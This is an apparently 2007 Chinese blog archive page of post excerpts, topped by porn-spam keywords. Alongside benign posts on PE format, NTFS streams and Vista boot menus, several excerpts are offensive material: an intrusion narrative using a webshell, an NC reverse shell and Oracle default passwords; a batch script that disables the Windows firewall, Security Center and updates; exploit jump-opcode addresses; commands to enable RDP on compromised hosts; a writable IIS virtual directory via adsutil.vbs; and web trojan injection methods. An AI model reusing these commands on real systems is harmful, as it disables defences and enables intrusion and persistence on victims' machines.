日韩精品电影在线,jizzjizz在线观看,欧美在线观看视频一区二区

利用ORACLE系統賬戶默認口令提升權限(ZT) 摘要:
近日，偶到一主機上逛了一圈。主機的配置還算是安全，偏偏一個比較隱藏的目錄下殘留了upfile.asp，結果輕輕松松的得到了webshell。

接著在主機上逛了逛，拿出superscan從外面掃了下，只開放了80端口。從user\程序目錄里，發現有一快捷方式：firecontrol，好象是某款硬件防火墻的控制臺。WEBSHELL下檢測了下開放的服務，發現一般的可提權的方法都不可行，無SERV-U等等，主機的補丁也是打到了最新。試了下傳了個NC上去，反連接得到一SHELL，這下比在老兵的管理器里舒服多了。

在C盤下看到一個目錄oracle，看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件，確定了主機的服務名“xxx”，看了下版本“oracle 8i”，用數據庫連接器

............. 閱讀全文

posted @ 2007-04-30 14:37 009 閱讀(268) | 評論 (0) 編輯

命令行添加程序到windows默認防火墻摘要: @echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
閱讀全文

posted @ 2007-04-22 12:25 009 閱讀(302) | 評論 (0) 編輯

“PE文件格式”1.9版完整譯文（附注釋）摘要: 標題: 【翻譯】“PE文件格式”1.9版完整譯文（附注釋）
作者: ah007
時間: 2006-02-28,13:32
鏈接: http://bbs.pediy.com/showthread.php?threadid=21932

$Id: pe.txt,v 1.9 1999/03/20 23:55:09 LUEVELSMEYER Exp $

PE文件格式系列譯文之一----
【翻譯】“PE文件格式”1.9版完整譯文（附注釋）
=========================================================
原著：Bernd. Luevelsmeyer
翻譯：ah007

[注意：本譯文的所有大小標題序號都是譯者添加，以方便大家閱讀。圓圈內的數字是注釋的編號，其中注釋②譯自微軟的《PECOFF規范》，其它譯自網絡。----譯者]
......... 閱讀全文

posted @ 2007-04-13 17:58 009 閱讀(1019) | 評論 (0) 編輯

腳本加密方法大全(ZT) 摘要: 本文一共介紹了七種方法：
一：最簡單的加密解密
二：轉義字符"\"的妙用
三：使用Microsoft出品的腳本編碼器Script Encoder來進行編碼（自創簡單解碼）
四：任意添加NUL空字符（十六進制00H）（自創）
...................
閱讀全文

posted @ 2007-04-13 12:22 009 閱讀(373) | 評論 (0) 編輯

一些opcodes(ZT) 摘要: 近日在寫exploit的時候需要用到一些其他語言的call ebx的跳轉地址，但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機器的跳轉地址，所以費了點時間收集了下，在這里要感謝傲少提供的機器給我去找地址。現在貼到這里，方便大家。

簡體中文windows的通用跳轉地址：(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..............
閱讀全文

posted @ 2007-04-10 11:48 009 閱讀(261) | 評論 (0) 編輯

開3389的幾種方法(留帖備查) 摘要: 1.打開記事本，編輯內容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好后存為BAT文件，上傳至肉雞，執行。這里值得注意的是要確定winnt是否在c盤，如果在其他盤則需要改動。
...................

閱讀全文

posted @ 2007-04-10 11:40 009 閱讀(317) | 評論 (0) 編輯

adsutil.vbs 摘要: web 和數據分離,有Pcanywhere,數據庫服務器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一個Web服務的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir創建一個虛擬目錄wodexi
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/path c:\ 設置路徑
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accesswrite 1設置寫權限
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi 閱讀全文

posted @ 2007-04-10 11:32 009 閱讀(760) | 評論 (0) 編輯

掛馬代碼大全(ZT) 摘要: 一:框架掛馬

二:js文件掛馬

首先將以下代碼
document.write("");
保存為xxx.js，
則JS掛馬代碼為

三:js變形加密

muma.txt可改成任意后綴
.............
閱讀全文

posted @ 2007-04-09 11:39 009 閱讀(242) | 評論 (0) 編輯

水果機密碼解碼 "密碼公式" 看了就知道怎么打暴機了(ZT) 摘要: 笨驢的老虎機一共有7個賭項，分別是：

bar，賠率50，出現概率1/22（不明白為什么用這個詞，英語達人來講講，偶門家鄉管這個叫大50）；
77，賠率30，出現概率1/11；
西瓜，賠率10，出現概率1/11；
星星，賠率8，出現概率3/22；
鈴當，賠率6，出現概率3/22；
木瓜，賠率4，出現概率2/11；
蘋果，賠率2，出現概率3/11；
...................
閱讀全文

posted @ 2007-04-09 11:11 009 閱讀(17500) | 評論 (2) 編輯

用ntfs流隱藏文件(zt) 摘要: 大家把ntfs分區上的文件拷貝到非ntfs分區上時, 可能偶爾遇到過下面的情況, 系統提示會有數據丟失, 這是怎么回事呢?

實際上ntfs文件系統引入了"流"這個概念, 每個文件都可以有多個流, 而我們一般只使用了一個, 通過給文件分配更多的流, 可以實現某種意義上的"文件隱藏". 例如可以控制臺中使用下面的命令建立一個文本文件:
dir d:>abc.txt
............
閱讀全文

posted @ 2007-04-05 21:52 009 閱讀(951) | 評論 (0) 編輯

冰刃IceSword FAQ 進程、端口、服務篇(ZT) 摘要: 問：現在進程端口工具很多，什么要使用IceSword？
答：1、絕大多數所謂的進程工具都是利用Windows的Toolhlp32或psapi再或ZwQuerySystemInformation系統調用（前二者最終也用到此調用）來編寫，隨便一個ApiHook就可輕輕松松干掉它們，更不用說一些內核級后門了；極少數工具利用內核線程調度結構來查詢進程，這種方案需要硬編碼，不僅不同
版本系統不同，打個補丁也可能需要升級程序，并且現在有人也提出過防止此
種查找的方法。而IceSword的進程查找核心態方案是目前獨一無二的，并且
充分考慮內核后門可能的隱藏手段，目前可以查出所有隱藏進程。
2、絕大多數工具查找進程路徑名也是通過Toolhlp32、psapi，前者會調用RtlDebug***函數向目標注入遠線程，后者會用調試api讀取目標進程內存，本質上都是對PEB的枚舉，前面我的blog提到過輕易修改PEB就讓這些工具找不到北了。而IceSword的核心態方案原原本本地將全路徑展示，就算運行時剪切到其他路徑也會隨之顯示。
3、進程dll 閱讀全文

posted @ 2007-04-04 15:15 009 閱讀(437) | 評論 (0) 編輯

Vista啟動菜單的多個問題摘要: 經歷了上次的"Acronis os selector 引發系統不能啟動"事件后，我的vista也廢了，恢復過程中碰到多個問題，記錄一下以備查閱

C盤 Windows2003
D盤 Windows Vista
E盤 Ubuntu
F盤數據，軟件等

我先Ghost恢復了Windows2003，再恢復Ubuntu，由于Vista在Ghost備份之后加了很多東西，夢幻桌面，收音機等很多側邊欄等等的工具，沒有進行Ghost恢復，使用Vista PE啟動光盤啟動，有個修復Vista啟動項的程序，修復重啟（應該是此時生成了BCD數據庫），發現只能進Windows Vista，沒有Windows2003的多啟動菜單了，再次使用Vista PE啟動光盤啟動，修改BCD數據庫文件，執行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr 閱讀全文

posted @ 2007-04-02 22:46 009 閱讀(796) | 評論 (0) 編輯

更改驅動器號摘要: HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices

一看就明白
閱讀全文

posted @ 2007-04-02 22:08 009 閱讀(332) | 評論 (0) 編輯

教你如何雙啟動Windows XP和Windows Vista(ZT) 摘要: 　　假如你認為安裝一個Windows操作系統不夠用，或者你感覺生活中的麻煩還不夠多，那就同時安裝Windows XP和Windows Vista系統吧。

　　為什么不呢？坦率的說，我不知道為什么有人想這么做。正如在上一篇博客中提到的那樣，Windows Vista對于MBR（主引導記錄）的支配地位，使得處理器十分排外。一旦電腦上安裝了Vista，用戶就必須按照Vista制定的規則來操作電腦。

　　硬盤分區
...........
閱讀全文

posted @ 2007-04-02 15:58 009 閱讀(285) | 評論 (0) 編輯

解決Vista的多啟動菜單摘要: 同樣，網上講的，大多數是垃圾

比如C盤有個Win2k3，使用Vista PE啟動，使用命令行執行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
bcdedit /displayorder {ntldr} -addlast
以上是我碰到的Vista啟動菜單問題的解決方法
............
閱讀全文

posted @ 2007-04-02 15:56 009 閱讀(551) | 評論 (0) 編輯

04 2007 檔案

公告

常用鏈接

留言簿(113)

隨筆分類

隨筆檔案

文章分類

相冊

Link

搜索

最新評論

閱讀排行榜

評論排行榜

酒水不犯茶水葉的離去，是風的追求還是樹的不挽留？
BlogJava \| 首頁 \| 發新隨筆 \| 發新文章 \| 聯系 \| 聚合 \| 管理	隨筆：325 文章：0 評論：612 引用：0